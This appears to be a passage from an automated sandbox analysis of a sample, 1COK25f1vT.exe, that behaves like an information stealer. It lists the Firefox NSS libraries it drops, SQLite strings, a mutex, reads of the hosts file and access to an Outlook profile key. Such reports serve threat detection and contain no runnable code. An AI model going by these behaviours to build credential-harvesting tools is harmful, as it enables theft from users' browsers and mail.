Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr Binary or memory string: SELECT ALL id FROM %s;
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00416290 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId, 12_2_00416290
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1676:120:WilError_01
Source: C:\Users\user\Desktop\1COK25f1vT.exe Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-FE96701B-9327B159A
Source: C:\Users\user\Desktop\1COK25f1vT.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\1COK25f1vT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479960511.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479481362.000000001F994000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491786540.00000000203A4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482100861.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482084797.000000001F99C000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, mozglue.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.12.dr
Source: Binary string: ucrtbase.pdb source: 1COK25f1vT.exe, 0000000C.00000003.489027569.000000001F308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, ucrtbase.dll.12.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471221878.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.470488936.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, freebl3.dll.12.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.463561095.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.476648214.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.476666229.000000001F9A0000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479096628.000000001F990000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491786540.00000000203A4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482506212.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482100861.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491797103.00000000203A8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.468064054.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477468468.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475402246.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475799639.000000001F998000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.12.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: 1COK25f1vT.exe, 0000000C.00000003.490976694.000000001F304000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.493685455.000000001F978000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490948392.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, vcruntime140.dll.12.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491604512.0000000020358000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491619490.000000002035C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, mozglue.dll.12.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491334003.0000000020320000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp, freebl3.dll.12.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491836442.00000000203BC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.481305544.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491748363.0000000020388000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.465766679.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491604512.0000000020358000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477869582.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.478268008.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.478663759.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr
